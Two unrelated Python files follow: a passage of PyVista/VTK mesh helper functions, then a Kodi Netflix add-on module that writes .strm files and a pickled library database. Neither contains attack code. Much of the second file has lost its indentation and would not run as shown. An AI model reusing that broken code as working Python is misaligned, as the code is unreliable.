    # Each cell is [2, start_id, end_id]: the vertex count followed by the
    # ids of the segment's two endpoints (consecutive point pairs).
    lines = np.c_[(2 * np.ones(n_lines, np.int_),
                   np.arange(0, n_points-1, step=2),
                   np.arange(1, n_points+1, step=2))]
    poly = pyvista.PolyData()
    poly.points = points
    poly.lines = lines
    return poly
def lines_from_points(points, close=False):
    """Make a connected line set given an array of points.

    Parameters
    ----------
    points : np.ndarray
        Points representing the vertices of the connected segments. For
        example, two line segments would be represented as:

        np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])

    close : bool, optional
        If True, close the line segments into a loop

    Return
    ------
    lines : pyvista.PolyData
        PolyData with lines and cells.

    """
    n_pts = len(points)
    # Each cell is [2, i, i+1]: consecutive points joined pairwise.
    cells = np.empty((n_pts - 1, 3), dtype=np.int_)
    cells[:, 0] = 2
    cells[:, 1] = np.arange(0, n_pts - 1, dtype=np.int_)
    cells[:, 2] = np.arange(1, n_pts, dtype=np.int_)
    if close:
        # Append one extra segment from the last point back to the first.
        cells = np.append(cells, [[2, n_pts - 1, 0]], axis=0)
    poly = pyvista.PolyData()
    poly.points = points
    poly.lines = cells
    return poly
def vector_poly_data(orig, vec):
    """Create a vtkPolyData object composed of vectors.

    Parameters
    ----------
    orig : array-like
        Vector origins; coerced to an (n, 3) float array (reshaped to
        (-1, 3) when not already 2-D).
    vec : array-like
        Vector components, one per origin; coerced the same way.

    Returns
    -------
    pyvista.PolyData
        Point cloud with a 'vectors' point array set as the active vectors
        and a 'mag' point array of vector magnitudes set as the active
        scalars.
    """
    # shape, dimension checking
    if not isinstance(orig, np.ndarray):
        orig = np.asarray(orig)
    if not isinstance(vec, np.ndarray):
        vec = np.asarray(vec)
    if orig.ndim != 2:
        orig = orig.reshape((-1, 3))
    elif orig.shape[1] != 3:
        raise ValueError('orig array must be 3D')
    if vec.ndim != 2:
        vec = vec.reshape((-1, 3))
    elif vec.shape[1] != 3:
        raise ValueError('vec array must be 3D')
    # Create vtk points and cells objects
    vpts = vtk.vtkPoints()
    vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
    npts = orig.shape[0]
    # One vertex cell per origin: [1, point_id]
    cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
    cells[:, 0] = 1
    cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
    vcells = pyvista.utilities.cells.CellArray(cells, npts)
    # Create vtkPolyData object
    pdata = vtk.vtkPolyData()
    pdata.SetPoints(vpts)
    pdata.SetVerts(vcells)
    # Add vectors to polydata
    name = 'vectors'
    vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
    vtkfloat.SetName(name)
    pdata.GetPointData().AddArray(vtkfloat)
    pdata.GetPointData().SetActiveVectors(name)
    # Add magnitude of vectors to polydata
    name = 'mag'
    # Euclidean norm of each row vector
    scalars = (vec * vec).sum(1)**0.5
    vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
    vtkfloat.SetName(name)
    pdata.GetPointData().AddArray(vtkfloat)
    pdata.GetPointData().SetActiveScalars(name)
    return pyvista.PolyData(pdata)
def trans_from_matrix(matrix):
    """Convert a vtk matrix to a numpy.ndarray."""
    # Pull the 4x4 elements out one at a time into a float array.
    return np.array(
        [[matrix.GetElement(row, col) for col in range(4)] for row in range(4)],
        dtype=np.float64)
def is_meshio_mesh(mesh):
    """Test if passed object is instance of ``meshio.Mesh``."""
    # meshio is an optional dependency; anything is "not a meshio mesh"
    # when it isn't installed.
    try:
        from meshio import Mesh
    except ImportError:
        return False
    return isinstance(mesh, Mesh)
def wrap(vtkdataset):
    """Wrap any given VTK data object to its appropriate PyVista data object.

    Other formats that are supported include:

    * 2D :class:`numpy.ndarray` of XYZ vertices
    * 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.

    Parameters
    ----------
    vtkdataset
        A VTK data object, a :class:`numpy.ndarray`, a ``meshio.Mesh``,
        or ``None``.

    Returns
    -------
    The wrapped pyvista object, ``None`` for ``None`` input, or the input
    unchanged when its VTK type has no wrapper.

    Raises
    ------
    NotImplementedError
        For unsupported array shapes or unsupported input types.
    """
    wrappers = {
        'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
        'vtkRectilinearGrid': pyvista.RectilinearGrid,
        'vtkStructuredGrid': pyvista.StructuredGrid,
        'vtkPolyData': pyvista.PolyData,
        'vtkImageData': pyvista.UniformGrid,
        'vtkStructuredPoints': pyvista.UniformGrid,
        'vtkMultiBlockDataSet': pyvista.MultiBlock,
        'vtkTable': pyvista.Table,
        # 'vtkParametricSpline': pyvista.Spline,
    }
    # Otherwise, we assume a VTK data object was passed
    if hasattr(vtkdataset, 'GetClassName'):
        key = vtkdataset.GetClassName()
    elif vtkdataset is None:
        return None
    elif isinstance(vtkdataset, np.ndarray):
        if vtkdataset.ndim == 1 and vtkdataset.shape[0] == 3:
            # single XYZ point
            return pyvista.PolyData(vtkdataset)
        if vtkdataset.ndim == 2 and vtkdataset.shape[1] == 3:
            # n x 3 array of XYZ vertices
            return pyvista.PolyData(vtkdataset)
        elif vtkdataset.ndim == 3:
            # volume: values become scalars on a uniform grid
            mesh = pyvista.UniformGrid(vtkdataset.shape)
            mesh['values'] = vtkdataset.ravel(order='F')
            mesh.active_scalars_name = 'values'
            return mesh
        else:
            # shape is included in the message instead of the stray debug
            # ``print`` the original left before raising
            raise NotImplementedError(
                'NumPy array (shape {}) could not be converted to '
                'PyVista.'.format(vtkdataset.shape))
    elif is_meshio_mesh(vtkdataset):
        return from_meshio(vtkdataset)
    else:
        raise NotImplementedError('Type ({}) not able to be wrapped into a PyVista mesh.'.format(type(vtkdataset)))
    try:
        wrapped = wrappers[key](vtkdataset)
    except KeyError:
        logging.warning('VTK data type ({}) is not currently supported by pyvista.'.format(key))
        return vtkdataset  # if not supported just passes the VTK data object
    return wrapped
def image_to_texture(image):
    """Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.

    Thin convenience wrapper around the :class:`pyvista.Texture` constructor.
    """
    return pyvista.Texture(image)
def numpy_to_texture(image):
    """Convert a NumPy image array to a vtk.vtkTexture.

    Raises
    ------
    TypeError
        If ``image`` is not a :class:`numpy.ndarray`.
    """
    if isinstance(image, np.ndarray):
        return pyvista.Texture(image)
    raise TypeError('Unknown input type ({})'.format(type(image)))
def is_inside_bounds(point, bounds):
    """Check if a point is inside a set of bounds.

    Works for any dimensionality: ``bounds`` pairs up as
    ``(min0, max0, min1, max1, ...)``.  Scalars are treated as 1-D points.
    Note: deque inputs are consumed (popped) while checking.
    """
    if isinstance(point, (int, float)):
        point = [point]
    sequence_like = (np.ndarray, collections.abc.Sequence)
    if isinstance(point, sequence_like) and not isinstance(point, collections.deque):
        if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
            raise ValueError('Bounds mismatch point dimensionality')
        # Re-enter with deques so each axis can be consumed in order.
        return is_inside_bounds(collections.deque(point),
                                collections.deque(bounds))
    if not isinstance(point, collections.deque):
        raise TypeError('Unknown input data type ({}).'.format(type(point)))
    # Consume one coordinate and its (lower, upper) pair per iteration;
    # stop at the first axis that falls outside its interval.
    while len(point) >= 1:
        coord = point.popleft()
        lower = bounds.popleft()
        upper = bounds.popleft()
        if not (lower <= coord <= upper):
            return False
    return True
def fit_plane_to_points(points, return_meta=False):
    """Fit a plane to a set of points.

    Parameters
    ----------
    points : np.ndarray
        Size n by 3 array of points to fit a plane through

    return_meta : bool
        If true, also returns the center and normal used to generate the plane
    """
    cloud = np.array(points)
    center = cloud.mean(axis=0)
    # The right singular vectors of the centered cloud span the best-fit
    # plane; their cross product is the plane normal.
    _, _, vh = np.linalg.svd(cloud - center)
    normal = np.cross(vh[0], vh[1])
    plane = pyvista.Plane(center=center, direction=normal)
    return (plane, center, normal) if return_meta else plane
def raise_not_matching(scalars, mesh):
    """Raise a ValueError describing a scalars/dataset size mismatch.

    Parameters
    ----------
    scalars : np.ndarray
        The scalar array whose size does not fit ``mesh``.
    mesh : vtk.vtkTable or pyvista dataset
        The dataset the scalars were intended for.

    Raises
    ------
    ValueError
        Always; message states the sizes that were expected.
    """
    if isinstance(mesh, vtk.vtkTable):
        # Tables match scalars against rows rather than points/cells.
        # (Space added after '({})' -- the message previously rendered
        # as "(3)must match".)
        raise ValueError('Number of scalars ({}) '.format(scalars.size) +
                         'must match number of rows ' +
                         '({}).'.format(mesh.n_rows))
    raise ValueError('Number of scalars ({}) '.format(scalars.size) +
                     'must match either the number of points ' +
                     '({}) '.format(mesh.n_points) +
                     'or the number of cells ' +
                     '({}). '.format(mesh.n_cells))
def generate_plane(normal, origin):
    """Return a vtk.vtkPlane through ``origin`` with the given normal."""
    # vtkPlane expects a unit normal.
    unit_normal = normal / np.linalg.norm(normal)
    plane = vtk.vtkPlane()
    plane.SetNormal(unit_normal)
    plane.SetOrigin(origin)
    return plane
def generate_report(additional=None, ncol=3, text_width=54, sort=False):
    """Generate a report.

    DEPRECATED: Please use :class:`pyvista.Report` instead.
    """
    logging.warning('DEPRECATED: Please use `pyvista.Report` instead.')
    core_packages = ['pyvista', 'vtk', 'numpy', 'imageio', 'appdirs', 'scooby']
    optional_packages = ['matplotlib', 'PyQt5', 'IPython', 'colorcet', 'cmocean']
    return scooby.Report(core=core_packages, optional=optional_packages,
                         additional=additional, ncol=ncol,
                         text_width=text_width, sort=sort)
def try_callback(func, *args):
    """Wrap a given callback in a try statement.

    Any exception raised by ``func`` is logged as a warning instead of
    propagating, so a faulty callback cannot crash the caller.
    """
    try:
        func(*args)
    except Exception as exc:
        logging.warning('Encountered issue in callback: {}'.format(exc))
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
    """Check if depth peeling is available.

    Attempts to use depth peeling to see if it is available for the current
    environment. Returns ``True`` if depth peeling is available and has been
    successfully leveraged, otherwise ``False``.

    Parameters
    ----------
    number_of_peels : int
        Maximum number of peeling layers requested from the renderer.
    occlusion_ratio : float
        Occlusion ratio handed to the renderer; 0.0 requests exact results.
    """
    # Try Depth Peeling with a basic scene
    source = vtk.vtkSphereSource()
    mapper = vtk.vtkPolyDataMapper()
    mapper.SetInputConnection(source.GetOutputPort())
    actor = vtk.vtkActor()
    actor.SetMapper(mapper)
    # requires opacity < 1
    actor.GetProperty().SetOpacity(0.5)
    renderer = vtk.vtkRenderer()
    renderWindow = vtk.vtkRenderWindow()
    renderWindow.AddRenderer(renderer)
    # off-screen window with alpha bit planes on and multisampling off --
    # the window configuration depth peeling requires (see VTK docs)
    renderWindow.SetOffScreenRendering(True)
    renderWindow.SetAlphaBitPlanes(True)
    renderWindow.SetMultiSamples(0)
    renderer.AddActor(actor)
    renderer.SetUseDepthPeeling(True)
    renderer.SetMaximumNumberOfPeels(number_of_peels)
    renderer.SetOcclusionRatio(occlusion_ratio)
    renderWindow.Render()
    # VTK records whether the last render actually used depth peeling
    return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
    """Call a function using a thread.

    Decorator: the wrapped callable starts ``fn`` in a new ``Thread`` and
    returns the thread object so callers may ``join`` it.
    """
    from functools import wraps

    # Preserve the decorated function's name/docstring -- the original
    # wrapper clobbered them with 'wrapper'.
    @wraps(fn)
    def wrapper(*args, **kwargs):
        thread = Thread(target=fn, args=args, kwargs=kwargs)
        thread.start()
        return thread
    return wrapper
class conditional_decorator:
    """Apply a decorator to a function only when a condition holds."""

    def __init__(self, dec, condition):
        """Store the decorator and the gating condition."""
        self.decorator = dec
        self.condition = condition

    def __call__(self, func):
        """Return ``func`` decorated, or unchanged when the condition is falsy."""
        if self.condition:
            return self.decorator(func)
        # Condition not met: hand back the function untouched.
        return func
class ProgressMonitor():
    """A standard class for monitoring the progress of a VTK algorithm.

    This must be used in a ``with`` context and it will block keyboard
    interrupts from happening until the exit event as interrupts will crash
    the kernel if the VTK algorithm is still executing.

    Attaches itself as an observer for ``vtk.vtkCommand.ProgressEvent`` on
    ``algorithm`` and mirrors the algorithm's progress in a ``tqdm`` bar.
    """
    def __init__(self, algorithm, message="", scaling=100):
        """Initialize observer.

        Parameters
        ----------
        algorithm
            The VTK algorithm whose ProgressEvent will be observed.
        message : str
            Label shown next to the progress bar.
        scaling : int
            Accepted for API compatibility; not used in this class.
        """
        # Fail fast if the optional tqdm dependency is missing.
        try:
            from tqdm import tqdm
        except ImportError:
            raise ImportError("Please install `tqdm` to monitor algorithms.")
        self.event_type = vtk.vtkCommand.ProgressEvent
        self.progress = 0.0
        self._last_progress = self.progress
        self.algorithm = algorithm
        self.message = message
        # Holds the (sig, frame) tuple when SIGINT arrives mid-run;
        # checked in __call__ so the algorithm aborts cleanly.
        self._interrupt_signal_received = False
        self._old_progress = 0
        self._old_handler = None
        self._progress_bar = None
    def handler(self, sig, frame):
        """Pass signal to custom interrupt handler.

        Stores the interrupt so the running VTK algorithm can be aborted
        on the next progress event instead of crashing mid-execution.
        """
        self._interrupt_signal_received = (sig, frame)
        logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
                      'VTK algorithm finishes.')
    def __call__(self, obj, event, *args):
        """Call progress update callback.

        On an event occurrence, this function executes.
        """
        if self._interrupt_signal_received:
            # A SIGINT came in earlier: ask the algorithm to stop.
            obj.AbortExecuteOn()
        else:
            progress = obj.GetProgress()
            # tqdm.update expects an increment, not an absolute value.
            step = progress - self._old_progress
            self._progress_bar.update(step)
            self._old_progress = progress
    def __enter__(self):
        """Enter event for ``with`` context."""
        from tqdm import tqdm
        # check if in main thread -- Python only allows installing signal
        # handlers from the main thread
        if threading.current_thread().__class__.__name__ == '_MainThread':
            self._old_handler = signal.signal(signal.SIGINT, self.handler)
        self._progress_bar = tqdm(total=1, leave=True,
                                  bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
        self._progress_bar.set_description(self.message)
        self.algorithm.AddObserver(self.event_type, self)
        return self._progress_bar
    def __exit__(self, type, value, traceback):
        """Exit event for ``with`` context."""
        # Snap the bar to completion, close it, and detach the observer.
        self._progress_bar.total = 1
        self._progress_bar.refresh()
        self._progress_bar.close()
        self.algorithm.RemoveObservers(self.event_type)
        if threading.current_thread().__class__.__name__ == '_MainThread':
            # restore whatever SIGINT handler was active before __enter__
            signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
    """Decorate a class, overriding __new__.

    Blocks direct instantiation of ``cls_`` (similar to ``abc.ABCMeta``)
    without requiring any abstract method; subclasses instantiate normally.
    """
    def __new__(cls, *args, **kwargs):
        # Only the decorated class itself is barred, not its subclasses.
        if cls is cls_:
            raise TypeError('{} is an abstract class and may not be instantiated.'
                            .format(cls.__name__))
        return object.__new__(cls)
    cls_.__new__ = __new__
    return cls_
|
Library.py | # pylint: skip-file
# -*- coding: utf-8 -*-
# Module: LibraryExporter
# Created on: 13.01.2017
import os
import re
import time
import threading
import xbmc
import xbmcgui
import xbmcvfs
import requests
from utils import noop
from KodiHelper import KodiHelper
try:
import cPickle as pickle
except:
import pickle
class Library(object):
    """Exports Netflix shows & movies to a local library folder"""
    # NOTE: this module targets Kodi's Python 2 interpreter -- methods in
    # this class rely on ``unicode`` and str/unicode encoding semantics.
    series_label = 'shows'
    """str: Label to identify shows"""
    movies_label = 'movies'
    """str: Label to identify movies"""
    metadata_label = 'metadata'
    """str: Label to identify metadata"""
    imagecache_label = 'imagecache'
    """str: Label to identify imagecache"""
    db_filename = 'lib.ndb'
    """str: (File)Name of the store for the database dump that contains
    all shows/movies added to the library"""
    def __init__(self, nx_common):
        """
        Takes the instances & configuration options needed to drive the plugin

        Parameters
        ----------
        nx_common :
            Shared plugin helper; must provide ``get_setting``,
            ``data_path``, ``log`` and ``check_folder_path``
        """
        enable_custom_folder = nx_common.get_setting('enablelibraryfolder')
        self.nx_common = nx_common
        # KodiHelper is injected later via ``set_kodi_helper``
        self.kodi_helper = None
        self.base_data_path = nx_common.data_path
        self.enable_custom_library_folder = enable_custom_folder
        self.custom_library_folder = nx_common.get_setting('customlibraryfolder')
        self.db_filepath = os.path.join(self.base_data_path, self.db_filename)
        self.log = nx_common.log
        # check for local library folder & set up the paths
        # (Kodi settings are strings: 'true' enables the custom folder)
        if self.enable_custom_library_folder != 'true':
            lib_path = self.base_data_path
        else:
            lib_path = self.custom_library_folder
        self.movie_path = os.path.join(lib_path, self.movies_label)
        self.tvshow_path = os.path.join(lib_path, self.series_label)
        self.metadata_path = os.path.join(lib_path, self.metadata_label)
        self.imagecache_path = os.path.join(lib_path, self.imagecache_label)
        # check if we need to setup the base folder structure & do so if needed
        self.setup_local_netflix_library(source={
            self.movies_label: self.movie_path,
            self.series_label: self.tvshow_path,
            self.metadata_label: self.metadata_path,
            self.imagecache_label: self.imagecache_path
        })
        # load the local db
        self.db = self._load_local_db(filename=self.db_filepath)
    def set_kodi_helper(self, kodi_helper):
        """Store the KodiHelper used for dialogs & localized strings."""
        self.kodi_helper = kodi_helper
def setup_local_netflix_library(self, source):
"""Sets up the basic directories
Parameters
----------
source : :obj:`dict` of :obj:`str`
Dicitionary with directories to be created
"""
for label in source:
exists = xbmcvfs.exists(
path=self.nx_common.check_folder_path(source[label]))
if not exists:
xbmcvfs.mkdir(source[label])
    def write_strm_file(self, path, url, title_player):
        """Writes the stream file that Kodi can use to integrate it into the DB

        Parameters
        ----------
        path : :obj:`str`
            Filepath of the file to be created

        url : :obj:`str`
            Stream url

        title_player : :obj:`str`
            Video fallback title for m3u
        """
        # Build an ASCII-folded copy of the path for log output only
        # (Python 2 str/unicode handling).
        if isinstance(path, str):
            logpath = path.decode('ascii', 'ignore').encode('ascii')
        elif isinstance(path, unicode):
            logpath = path.encode('ascii', 'ignore')
        # NOTE(review): if ``path`` were neither str nor unicode, ``logpath``
        # would be unbound and the next line would raise NameError -- callers
        # appear to always pass strings, but worth confirming.
        self.log('Writing {}'.format(logpath))
        f = xbmcvfs.File(path, 'w')
        # The #EXTINF line supplies a fallback display title (m3u syntax).
        f.write('#EXTINF:-1,'+title_player.encode('utf-8')+'\n')
        f.write(url)
        f.close()
        self.log('Successfully wrote {}'.format(logpath))
def write_metadata_file(self, video_id, content):
"""Writes the metadata file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged metadata from netflix
"""
meta_file = os.path.join(self.metadata_path, video_id+'.meta')
if not xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'wb')
pickle.dump(content, f)
f.close()
def read_metadata_file(self, video_id):
"""Reads the metadata file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged metadata from cache file
"""
meta_file = os.path.join(self.metadata_path, str(video_id)+'.meta')
if xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'rb')
content = f.read()
f.close()
meta_data = pickle.loads(content)
return meta_data
return
def read_artdata_file(self, video_id):
"""Reads the artdata file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged artdata from cache file
"""
meta_file = os.path.join(self.metadata_path, str(video_id)+'.art')
if xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'rb')
content = f.read()
f.close()
meta_data = pickle.loads(content)
return meta_data
return
def write_artdata_file(self, video_id, content):
"""Writes the art data file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged artdata from netflix
"""
meta_file = os.path.join(self.metadata_path, video_id+'.art')
if not xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'wb')
pickle.dump(content, f)
f.close()
def _load_local_db(self, filename):
"""Loads the local db file and parses it, creates one if not existent
Parameters
----------
filename : :obj:`str`
Filepath of db file
Returns
-------
:obj:`dict`
Parsed contents of the db file
"""
# if the db doesn't exist, create it
if not os.path.isfile(filename):
data = {self.movies_label: {}, self.series_label: {}}
self.log('Setup local library DB')
self._update_local_db(filename=filename, db=data)
return data
with open(filename) as f:
data = pickle.load(f)
if data:
return data
else:
return {}
def _update_local_db(self, filename, db):
"""Updates the local db file with new data
Parameters
----------
filename : :obj:`str`
Filepath of db file
db : :obj:`dict`
Database contents
Returns
-------
bool
Update has been successfully executed
"""
if not os.path.isdir(os.path.dirname(filename)):
return False
with open(filename, 'w') as f:
f.truncate()
pickle.dump(db, f)
return True
def movie_exists(self, title, year):
"""Checks if a movie is already present in the local DB
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Movie exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
movie_meta = '%s (%d)' % (title, year)
return movie_meta in self.db[self.movies_label]
def show_exists(self, title):
"""Checks if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Show exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
show_meta = '%s' % (title)
return show_meta in self.db[self.series_label]
def season_exists(self, title, season):
"""Checks if a season is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Season of show exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
if self.show_exists(title) is False:
return False
show_entry = self.db[self.series_label][title]
return season in show_entry['seasons']
def episode_exists(self, title, season, episode):
"""Checks if an episode if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Episode of show exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
if self.show_exists(title) is False:
return False
show_entry = self.db[self.series_label][title]
episode_entry = 'S%02dE%02d' % (season, episode)
return episode_entry in show_entry['episodes']
def add_movie(self, title, alt_title, year, video_id, build_url):
"""Adds a movie to the local db, generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
year : :obj:`int`
Release year of the show
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
movie_meta = '%s (%d)' % (title, year)
folder = re.sub(r'[?|$|!|:|#]', r'', alt_title)
dirname = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, folder))
filename = os.path.join(dirname, movie_meta + '.strm')
progress = xbmcgui.DialogProgress()
progress.create(self.kodi_helper.get_local_string(650), movie_meta)
if xbmcvfs.exists(filename):
return
if not xbmcvfs.exists(dirname):
xbmcvfs.mkdirs(dirname)
if self.movie_exists(title=title, year=year) is False:
progress.update(50)
time.sleep(0.5)
self.db[self.movies_label][movie_meta] = {'alt_title': alt_title}
self._update_local_db(filename=self.db_filepath, db=self.db)
url = build_url({'action': 'play_video', 'video_id': video_id})
self.write_strm_file(path=filename, url=url, title_player=movie_meta)
progress.update(100)
time.sleep(1)
progress.close()
    def add_show(self, netflix_id, title, alt_title, episodes, build_url,
                 in_background=False):
        """Adds a show to the local db, generates & persists the strm files

        Note: Can also used to store complete seasons or single episodes,
        it all depends on what is present in the episodes dictionary

        Parameters
        ----------
        netflix_id : :obj:`str`
            Netflix ID of the show, stored in the DB entry
        title : :obj:`str`
            Title of the show
        alt_title : :obj:`str`
            Alternative title given by the user
        episodes : :obj:`dict` of :obj:`dict`
            Episodes that need to be added
        build_url : :obj:`fn`
            Function to generate the stream url
        in_background : bool
            When True, a silent (no-op) progress dialog is used and a
            notification is shown once the episodes are added

        Returns
        -------
        Show directory path, or ``False`` when there was nothing to export
        """
        title = re.sub(r'[?|$|!|:|#]', r'', title)
        show_meta = '%s' % (title)
        folder = re.sub(r'[?|$|!|:|#]', r'', alt_title.encode('utf-8'))
        show_dir = self.nx_common.check_folder_path(
            path=os.path.join(self.tvshow_path, folder))
        progress = self._create_progress_dialog(in_background)
        progress.create(self.kodi_helper.get_local_string(650), show_meta)
        if not xbmcvfs.exists(show_dir):
            self.log('Created show folder {}'.format(show_dir))
            xbmcvfs.mkdirs(show_dir)
        if self.show_exists(title) is False:
            self.log('Show does not exists, adding entry to internal library')
            self.db[self.series_label][show_meta] = {
                'netflix_id': netflix_id,
                'seasons': [],
                'episodes': [],
                'alt_title': alt_title}
        else:
            self.log('Show is present in internal library: {}'
                     .format(self.db[self.series_label][show_meta]))
            # Older DB entries may predate the netflix_id field; backfill it.
            if 'netflix_id' not in self.db[self.series_label][show_meta]:
                self.db[self.series_label][show_meta]['netflix_id'] = netflix_id
                self._update_local_db(filename=self.db_filepath, db=self.db)
                self.log('Added missing netflix_id={} for {} to internal library.'
                         .format(netflix_id, title.encode('utf-8')),
                         xbmc.LOGNOTICE)
        # Drop episodes that are already exported.
        episodes = [episode for episode in episodes
                    if not self.episode_exists(title, episode['season'],
                                               episode['episode'])]
        self.log('Episodes to export: {}'.format(episodes))
        if len(episodes) == 0:
            self.log('No episodes to export, exiting')
            # NOTE(review): this early return leaves the progress dialog
            # open -- confirm whether close() should be called here.
            return False
        step = round(100.0 / len(episodes), 1)
        percent = step
        for episode in episodes:
            desc = self.kodi_helper.get_local_string(20373) + ': '
            desc += str(episode.get('season'))
            long_desc = self.kodi_helper.get_local_string(20359) + ': '
            long_desc += str(episode.get('episode'))
            progress.update(
                percent=int(percent),
                line1=show_meta,
                line2=desc,
                line3=long_desc)
            # _add_episode updates the in-memory DB; it is persisted once
            # after the loop.
            self._add_episode(
                show_dir=show_dir,
                title=title,
                season=episode.get('season'),
                episode=episode.get('episode'),
                video_id=episode.get('id'),
                build_url=build_url)
            percent += step
            time.sleep(0.05)
        self._update_local_db(filename=self.db_filepath, db=self.db)
        time.sleep(1)
        progress.close()
        if in_background:
            self.kodi_helper.dialogs.show_episodes_added_notify(
                title, len(episodes), self.kodi_helper.icon)
        return show_dir
def _create_progress_dialog(self, is_noop):
if is_noop:
class NoopDialog():
def create(self, title, subtitle):
return noop()
def update(self, **kwargs):
return noop()
def close(self):
return noop()
return NoopDialog()
return xbmcgui.DialogProgress()
    def _add_episode(self, title, show_dir, season, episode, video_id, build_url):
        """
        Adds a single episode to the local DB,
        generates & persists the strm file

        Parameters
        ----------
        title : :obj:`str`
            Title of the show
        show_dir : :obj:`str`
            Directory that holds the stream files for that show
        season : :obj:`int`
            Season sequence number
        episode : :obj:`int`
            Episode sequence number
        video_id : :obj:`str`
            ID of the video to be played
        build_url : :obj:`fn`
            Function to generate the stream url

        Note: the in-memory DB is updated here but not written to disk;
        the caller (``add_show``) persists it afterwards.
        """
        season = int(season)
        episode = int(episode)
        title = re.sub(r'[?|$|!|:|#]', r'', title)
        self.log('Adding S{}E{} (id={}) of {} (dest={})'
                 .format(season, episode, video_id, title.encode('utf-8'),
                         show_dir))
        # add season
        if self.season_exists(title=title, season=season) is False:
            self.log(
                'Season {} does not exist, adding entry to internal library.'
                .format(season))
            self.db[self.series_label][title]['seasons'].append(season)
        # add episode
        episode_meta = 'S%02dE%02d' % (season, episode)
        episode_exists = self.episode_exists(
            title=title,
            season=season,
            episode=episode)
        if episode_exists is False:
            self.log(
                'S{}E{} does not exist, adding entry to internal library.'
                .format(season, episode))
            self.db[self.series_label][title]['episodes'].append(episode_meta)
        # create strm file
        filename = episode_meta + '.strm'
        filepath = os.path.join(show_dir, filename)
        if xbmcvfs.exists(filepath):
            # existing export wins; the DB entry above is still recorded
            self.log('strm file {} already exists, not writing it'
                     .format(filepath))
            return
        url = build_url({'action': 'play_video', 'video_id': video_id})
        self.write_strm_file(
            path=filepath,
            url=url,
            title_player=title + ' - ' + episode_meta)
def remove_movie(self, title, year):
"""Removes the DB entry & the strm file for the movie given
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
movie_meta = '%s (%d)' % (title, year)
folder = re.sub(
pattern=r'[?|$|!|:|#]',
repl=r'',
string=self.db[self.movies_label][movie_meta]['alt_title'])
progress = xbmcgui.DialogProgress()
progress.create(self.kodi_helper.get_local_string(1210), movie_meta)
progress.update(50)
time.sleep(0.5)
del self.db[self.movies_label][movie_meta]
self._update_local_db(filename=self.db_filepath, db=self.db)
dirname = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, folder))
filename = os.path.join(self.movie_path, folder, movie_meta + '.strm')
if xbmcvfs.exists(dirname):
xbmcvfs.delete(filename)
xbmcvfs.rmdir(dirname)
return True
return False
time.sleep(1)
progress.close()
def remove_show(self, title):
"""Removes the DB entry & the strm files for the show given
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
label = self.series_label
rep_str = self.db[label][title]['alt_title'].encode('utf-8')
folder = re.sub(
pattern=r'[?|$|!|:|#]',
repl=r'',
string=rep_str)
progress = xbmcgui.DialogProgress()
progress.create(self.kodi_helper.get_local_string(1210), title)
time.sleep(0.5)
del self.db[self.series_label][title]
self._update_local_db(filename=self.db_filepath, db=self.db)
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, folder))
if xbmcvfs.exists(show_dir):
show_files = xbmcvfs.listdir(show_dir)[1]
episode_count_total = len(show_files)
step = round(100.0 / episode_count_total, 1)
percent = 100 - step
for filename in show_files:
progress.update(int(percent))
xbmcvfs.delete(os.path.join(show_dir, filename))
percent = percent - step
time.sleep(0.05)
xbmcvfs.rmdir(show_dir)
return True
return False
time.sleep(1)
progress.close()
def remove_season(self, title, season):
"""Removes the DB entry & the strm files for a season of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title.encode('utf-8'))
season = int(season)
season_list = []
episodes_list = []
show_meta = '%s' % (title)
for season_entry in self.db[self.series_label][show_meta]['seasons']:
if season_entry != season:
season_list.append(season_entry)
